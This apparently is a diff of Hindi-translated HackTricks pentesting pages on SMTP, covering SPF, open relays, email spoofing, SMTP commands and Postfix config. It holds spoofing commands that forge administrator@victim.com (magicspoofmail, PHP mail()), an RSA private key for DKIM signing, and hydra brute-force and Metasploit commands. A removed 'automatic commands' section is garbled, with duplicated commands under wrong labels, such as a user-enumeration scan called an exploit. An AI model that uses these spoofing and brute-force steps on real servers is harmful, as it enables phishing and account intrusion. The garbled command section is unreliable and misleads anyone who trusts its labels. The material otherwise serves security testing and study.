> अगर मुझे pielovers.demon.co.uk से मेल मिलता है, और pielovers के लिए कोई SPF डेटा नहीं है, तो क्या मुझे एक स्तर पीछे जाकर demon.co.uk के लिए SPF टेस्ट करना चाहिए? नहीं। डेमन में प्रत्येक सबडोमेन एक अलग ग्राहक है, और प्रत्येक ग्राहक की अपनी नीति हो सकती है। डेमन की नीति का डिफ़ॉल्ट रूप से अपने सभी ग्राहकों पर लागू होना समझ में नहीं आता; अगर डेमन ऐसा करना चाहता है, तो वह प्रत्येक सबडोमेन के लिए SPF रिकॉर्ड्स सेट कर सकता है।
>
> इसलिए SPF प्रकाशकों के लिए सलाह यह है: आपको प्रत्येक उप-डोमेन या होस्टनाम के लिए एक SPF रिकॉर्ड जोड़ना चाहिए जिसके पास एक A या MX रिकॉर्ड हो।
> इसलिए SPF प्रकाशकों को सलाह यह है: आपको प्रत्येक सबडोमेन या होस्टनेम के लिए एक SPF रिकॉर्ड जोड़ना चाहिए जिसमें एक A या MX रिकॉर्ड हो।
>
> वाइल्डकार्ड A या MX रिकॉर्ड वाली साइटों को भी वाइल्डकार्ड SPF रिकॉर्ड होना चाहिए, जैसे: \* IN TXT "v=spf1 -all"
> वाइल्डकार्ड A या MX रिकॉर्ड्स वाली साइटों को भी एक वाइल्डकार्ड SPF रिकॉर्ड होना चाहिए, इस रूप में: \* IN TXT "v=spf1 -all"
यह समझ में आता है - एक उप-डोमेन बहुत ही अलग-अलग भौगोलिक स्थान में हो सकता है और उसकी SPF परिभाषा बहुत अलग हो सकती है।
यह समझ में आता है - एक सबडोमेन भौगोलिक स्थान में बहुत अलग हो सकता है और उसकी SPF परिभाषा बहुत अलग हो सकती है।
### **खुला रिले**
### **ओपन रिले**
स्पैम फ़िल्टरों द्वारा फ़िल्टर किए जाने और प्राप्तकर्ता तक पहुंचने से बचाने के लिए, भेजने वाले व्यक्ति को प्राप्तकर्ता द्वारा विश्वसनीय माना जाने वाले एक **रिले सर्वर का उपयोग** कर सकता है। अक्सर, प्रशासकों को यह पता नहीं होता है कि उन्हें किस **आईपी** रेंज की **अनुमति देनी** है। इसके परिणामस्वरूप, हम आउटर और इंटरनल पेनेट्रेशन टेस्ट में अक्सर ऐसे SMTP सर्वर की गलत विन्यास को पाएंगे। इसलिए, वे सभी आईपी पतों की **अनुमति देते हैं** ताकि ईमेल ट्रैफ़िक में त्रुटियाँ न हों और इस प्रकार ग्राहकों के साथ संचार को बाधित या अनजाने में रुकावट न हो।
स्पैम फ़िल्टर्स द्वारा भेजे गए ईमेल्स को फ़िल्टर किए जाने से रोकने और प्राप्तकर्ता तक न पहुँचने से बचाने के लिए, प्रेषक एक **रिले सर्वर का उपयोग कर सकता है जिस पर प्राप्तकर्ता भरोसा करता है**। अक्सर, प्रशासकों को **यह अवलोकन नहीं होता** कि उन्हें किन **IP** रेंजों को **अनुमति** देनी चाहिए। इससे SMTP सर्वर का गलत कॉन्फ़िगरेशन होता है जिसे हम बाहरी और आंतरिक पेनटेस्टिंग में अक्सर पाते हैं। इसलिए, वे **सभी IP पतों को अनुमति देते हैं** ताकि ईमेल ट्रैफ़िक में त्रुटियाँ न हों और इस तरह से संभावित और वर्तमान ग्राहकों के साथ संचार में बाधा या अनजाने में व्यवधान न हो।
```shell-session
mynetworks = 0.0.0.0/0
```
@ -495,10 +359,10 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
### **उपकरण**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **SPF और DMARC मिसकॉन्फ़िगरेशन की जांच करें**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **ऑटोमेटिक रूप से SPF और DMARC कॉन्फ़िगरेशन प्राप्त करें**
* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **SPF और DMARC की गलत कॉन्फ़िगरेशन की जाँच करें**
* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **स्वचालित रूप से SPF और DMARC कॉन्फ़िगरेशन प्राप्त करें**
### स्पूफ ईमेल भेजें
### स्पूफ ईमेल भेजें
* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
@ -514,8 +378,8 @@ python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
```
{% hint style="warning" %}
यदि आप **dkim python lib** का उपयोग करते समय किसी भी **त्रुटि का सामना करते हैं** और कुंजी को पार्स करने में समस्या होती है, तो निम्नलिखित को उपयोग करने में स्वतंत्र महसूस करें।\
**नोट**: यह केवल एक जल्दी से जांच करने के लिए एक गंदा ठीक करने का तरीका है जहां किसी कारण से openssl निजी कुंजी **dkim द्वारा पार्स नहीं की जा सकती है**
यदि आपको dkim python lib का उपयोग करते समय कोई **त्रुटि** मिलती है, तो इसके बजाय निम्नलिखित का उपयोग करने में संकोच न करें।\
**ध्यान दें**: यह केवल एक अस्थायी समाधान है ताकि जल्दी जांच की जा सके, विशेष रूप से उन मामलों में जहां किसी कारणवश openssl private key को dkim द्वारा पार्स नहीं किया जा सकता
```
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
@ -535,12 +399,12 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
```
{% endhint %}
**या आप इसे मैन्युअल तरके से कर सकते हैं:**
**या आप इसे मैन्युअली कर सकते हैं:**
{% tabs %}
{% tab title="PHP" %}
<pre class="language-php"><code class="lang-php"><strong># यह एक अप्रमाणित संदेश भेजेगा
</strong><strong>mail("your_email@gmail.com", "परीक्षण विषय!", "हेलो! यह एक परीक्षण है", "From: administrator@victim.com");
<pre class="language-php"><code class="lang-php"><strong># यह एक अहस्ताक्षरित संदेश भेजेगा
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
</strong></code></pre>
{% endtab %}
@ -605,28 +469,28 @@ s.sendmail(sender, [destination], msg_data)
### **अधिक जानकारी**
**इन सुरक्षा उपायों के बारे में अधिक जानकारी के लिए** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) **पर जाएं।**
**इन सुरक्षां के बारे में अधिक जानकारी के लिए देखें** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
### **अन्य फिशिंग संकेत**
### **अन्य फिशिंग संकेत**
* डोमेन की उम्र
* IP पते की ओर पहुंच करने वाले लिंक
* लिंक में बदलाव करने की तकनीकें
* डोमेन की आयु
* IP पते की ओर इशारा करने वाले लिंक
* लिंक हेरफेर तकनीकें
* संदिग्ध (असामान्य) अटैचमेंट्स
* टूटी हुई ईमेल सामग्री
* मेल हेडर्स के अलावा उपयोग किए जाने वाले मान
* मान्य और विश्वसनीय SSL प्रमाणपत्र की मौजूदगी
* पृष्ठ को वेब सामग्री फ़िल्टरिंग साइटों में सबमिट करना
* मेल हेडर्स के विपरीत इस्तेमाल किए गए मान
* मान्य और विश्वसनीय SSL प्रमाणपत्र का होना
* पृष्ठ को वेब सामग्री फ़िल्टरिंग साइटों पर जमा करना
## SMTP के माध्यम से डेटा निकास
## SMTP के माध्यम से डेटा चोर
**यदि आप SMTP के माध्यम से डेटा भेज सकते हैं** [**इसे पढ़ें**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**।**
**यदि आप SMTP के माध्यम से डेटा भेज सकते हैं** [**यह पढ़ें**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
## कॉन्फ़िग फ़ाइल
### Postfix
आमतौर पर, यदि स्थापित है, `/etc/postfix/master.cf` में **ऐसे स्क्रिप्ट होते हैं** जो उदाहरण के लिए जब एक नया मेल उपयोगकर्ता द्वारा प्राप्त किया जाता है तो कार्यान्वित होते हैं। उदाहरण के लिए, पंक्ति `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` यह दर्शाती है कि यदि उपयोगकर्ता मार्क द्वारा एक नया मेल प्राप्त होता है तो `/etc/postfix/filtering` कार्यान्वित होगा
आमतौर पर, अगर स्थापित है, तो `/etc/postfix/master.cf` में **स्क्रिप्ट्स निष्पादित करने के लिए** होती हैं जब उदाहरण के लिए एक नया मेल किसी उपयोगकर्ता द्वारा प्राप्त किया जाता है। उदाहरण के लिए लाइन `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` का मतलब है कि `/etc/postfix/filtering` निष्पादित होगी अगर उपयोगकर्ता मार्क द्वारा एक नया मेल प्राप्त होता है।
अन्य कॉन्फ़िग फ़ाइलें:
```
@ -634,131 +498,6 @@ sendmail.cf
submit.cf
```
## HackTricks स्वचालित आदेश
### SMTP
#### ईमेल आईडी का पता लगाएं
यदि आपको एक ईमेल आईडी का पता लगाना है, तो आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
smtp-user-enum -M VRFY -U /path/to/usernames.txt -t <target_ip>
```
यह आदेश एक उपयोगकर्ता नाम सूची का उपयोग करके SMTP सर्वर पर ईमेल आईडी की जांच करेगा।
#### SMTP ब्रूटफोर्सिंग
SMTP सर्वर पर ब्रूटफोर्सिंग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
smtp-user-enum -M VRFY -U /path/to/usernames.txt -t <target_ip>
```
यह आदेश एक उपयोगकर्ता नाम सूची का उपयोग करके SMTP सर्वर पर ब्रूटफोर्सिंग करेगा।
#### SMTP एक्स्प्लोइट
SMTP सर्वर पर एक्स्प्लोइट करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
run
```
यह आदेश Metasploit फ्रेमवर्क का उपयोग करके SMTP सर्वर को एक्स्प्लोइट करेगा।
#### SMTP वेब सर्वर का उपयोग करना
SMTP सर्वर का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
telnet <target_ip> 25
```
यह आदेश आपको SMTP सर्वर के साथ एक टेलनेट सत्र शुरू करने की अनुमति देगा।
#### SMTP लॉगिंग
SMTP सर्वर के लॉग देखने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
tail -f /var/log/mail.log
```
यह आदेश आपको `/var/log/mail.log` फ़ाइल के लॉग को लाइव देखने की अनुमति देगा।
#### SMTP वेब इंटरफेस का उपयोग करना
SMTP सर्वर के लिए वेब इंटरफेस का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
firefox http://<target_ip>:<port>
```
यह आदेश आपको वेब ब्राउज़र में SMTP सर्वर के लिए वेब इंटरफेस खोलने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट पासवर्ड का उपयोग करना
SMTP सर्वर के लिए डिफ़ॉल्ट पासवर्ड का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -l <username> -P /path/to/passwords.txt <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट पासवर्ड के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट उपयोगकर्ता नाम का उपयोग करना
SMTP सर्वर के लिए डिफ़ॉल्ट उपयोगकर्ता नाम का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -L /path/to/usernames.txt -p <password> <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट उपयोगकर्ता नाम के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करना
SMTP सर्वर के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करना (विषम उपयोगकर्ता नाम)
SMTP सर्वर के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -l <username> -P /path/to/passwords.txt <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करना (विषम पासवर्ड)
SMTP सर्वर के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -L /path/to/usernames.txt -p <password> <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
#### SMTP वेब इंटरफेस के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करना (विषम उपयोगकर्ता नाम और पासवर्ड)
SMTP सर्वर के लिए डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड का उपयोग करने के लिए, आप निम्नलिखित आदेश का उपयोग कर सकते हैं:
```bash
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt <target_ip> smtp -V
```
यह आदेश आपको डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड के साथ SMTP सर्वर को हाइड्रा टूल का उपयोग करके ब्रूटफ़ोर्स करने की अनुमति देगा।
```
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
@ -811,19 +550,21 @@ Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {
```
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference**](https://www.dragonjarcon.org/) **एक अंतरराष्ट्रीय साइबर सुरक्षा कार्यक्रम है** जो 7 और 8 सितंबर 2023 को कोलंबिया के बोगोटा में आयोजित होगा। यह एक तकनीकी विषय पर आधारित कार्यक्रम है जहां स्पेनिश में नवीनतम शोध प्रस्तुत किए जाते हैं और यह दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।\
इस महान सम्मेलन को न छोड़ें, नीचे दिए गए लिंक पर अभी पंजीकरण करें!:
[**DragonJAR Security Conference एक अंतर्राष्ट्रीय साइबर सुरक्षा इवेंट है**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से आयोजित हो रहा है और यह 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में होगा। यह एक उच्च तकनीकी सामग्री वाला इवेंट है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करता है।\
अभी निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी में काम करते हैं**? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की आवश्यकता है**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें**.
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**
* **अपनी हैकिंग ट्रिक्स साझा करें HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details>

73
network-services-pentesting/pentesting-smtp/smtp-commands.md
View file

@ -1,47 +1,84 @@
# SMTP - कमांड्स
# SMTP - आदेश
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एकल [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से चल रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में आयोजित किया जाएगा। यह एक उच्च तकनीकी सामग्री वाला आयोजन है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अब निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
**से निकाला गया:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
**HELO**\
यह पहली SMTP कमांड है: यह बातचीत शुरू करता है और भेजने वाले सर्वर की पहचान करता है और आमतौर पर इसके डोमेन नाम के बाद आता है।
यह पहला SMTP आदेश है: यह वार्तालाप शुरू करता है जिसमें प्रेषक सर्वर की पहचान होती है और आमतौर पर इसके डोमेन नाम के साथ होता है।
**EHLO**\
बातचीत शुरू करने के लिए एक वैकल्पिक कमांड है, जो दर्शाता है कि सर्वर विस्तारित SMTP प्रोटोकॉल का उपयोग कर रहा है।
वार्तालाप शुरू करने के लिए एक वैकल्पिक आदेश, यह दर्शाता है कि सर्वर Extended SMTP प्रोटोकॉल का उपयोग कर रहा है।
**MAIL FROM**\
इस SMTP कमांड के साथ, कार्रवाई शुरू होती है: भेजने वाला व्यक्ति "From" फ़ील्ड में स्रोत ईमेल पता बताता है और वास्तविक ईमेल संचार शुरू होता है।
इस SMTP आदेश के साथ ऑपरेशन शुरू होते हैं: प्रेषक "From" फील्ड में स्रोत ईमेल पते को बताता है और वास्तव में ईमेल स्थानांतरण शुरू करता है।
**RCPT TO**\
यह ईमेल के प्राप्तकर्ता की पहचान करता है; यदि एक से अधिक होते हैं, तो कमांड सीधे पते के द्वारा बस दोहराई जाती है।
यह ईमेल के प्राप्तकर्ता की पहचान करता है; यदि एक से अधिक हैं, तो आदेश को सिर्फ पते दर पते दोहराया जाता है।
**SIZE**\
यह SMTP कमांड दूरस्थ सर्वर को संलग्न ईमेल के अनुमानित आकार (बाइट में) के बारे में सूचित करता है। इसका उपयोग सर्वर द्वारा स्वीकार किए जाने वाले संदेश के अधिकतम आकार की रिपोर्ट करने के लिए भी किया जा सकता है।
यह SMTP आदेश दूरस्थ सर्वर को संलग्न ईमेल के अनुमानित आकार (बाइट्स के संदर्भ में) के बारे में सूचित करता है। इसका उपयोग सर्वर द्वारा स्वीकार किए जाने वाले संदेश के अधिकतम आकार की रिपोर्ट करने के लिए भी किया जा सकता है।
**DATA**\
DATA कमांड के साथ ईमेल सामग्री की संचार शुरू होती है; आमतौर पर इसके बाद सर्वर द्वारा दिए गए 354 उत्तर कोड के साथ जारी किया जाता है, जो वास्तविक प्रसारण शुरू करने की अनुमति देता है।
DATA आदेश के साथ ईमेल सामग्री का स्थानांतरण शुरू होता है; यह आमतौर पर सर्वर द्वारा दिए गए 354 प्रतिक्रिया कोड के बाद होता है, जो वास्तविक संचरण शुरू करने की अनुमति देता है।
**VRFY**\
सर्वर से यह पूछा जाता है कि क्या एक विशेष ईमेल पता या उपयोगकर्ता नाम वास्तव में मौजूद है।
सर्वर से यह पुष्टि करने के लिए कहा जाता है कि क्या एक विशेष ईमेल पता या उपयोगकर्ता नाम वास्तव में मौजूद है।
**TURN**\
यह कमांड क्लाइंट और सर्वर के बीच भूमिका को उल्टा करने के लिए उपयोग की जाती है, नए कनेक्शन चलाने की आवश्यकता के बिना
इस आदेश का उपयोग ग्राहक और सर्वर के बीच भूमिकाओं को उलटने के लिए किया जाता है, बिना नए कनेक्शन की आवश्यकता के
**AUTH**\
AUTH कमांड के साथ, क्लाइंट सर्वर को प्रमाणित करता है, अपना उपयोगकर्ता नाम और पासवर्ड देता है। यह एक सुरक्षा की और स्तर है जो एक उचित प्रसारण सुनिश्चित करने के लिए होती
AUTH आदेश के साथ, ग्राहक अपने उपयोगकर्ता नाम और पासवर्ड देकर सर्वर को प्रमाणित करता है। यह सुरक्षा की एक और परत है जो उचित संचरण की गारंटी देती है।
**RSET**\
यह सर्वर को सूचित करता है कि चल रहा ईमेल संचरण समाप्त होने वाला है, हालांकि SMTP वार्तालाप बंद नहीं होगा (QUIT के मामले की तरह)।
**EXPN**\
यह SMTP आदेश एक मेलिंग सूची की पहचान के बारे में पुष्टि मांगता है।
**HELP**\
यह ईमेल के सफल स्थानांतरण के लिए उपयोगी हो सकने वाली कुछ जानकारी के लिए ग्राहक का अनुरोध है।
**QUIT**\
यह SMTP वार्तालाप को समाप्त करता है।
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) जो एक दशक से अधिक समय से चल रहा है और 7 और 8 सितंबर 2023 को बोगोटा, कोलंबिया में आयोजित किया जाएगा। यह एक उच्च तकनीकी सामग्री वाला आयोजन है जहां स्पेनिश में नवीनतम अनुसंधान प्रस्तुत किए जाते हैं जो दुनिया भर के हैकर्स और शोधकर्ताओं को आकर्षित करते हैं।\
अब निम्नलिखित लिंक पर रजिस्टर करें और इस महान सम्मेलन को मिस न करें!:
{% embed url="https://www.dragonjarcon.org/" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

100
network-services-pentesting/pentesting-snmp/README.md
View file

@ -2,18 +2,20 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
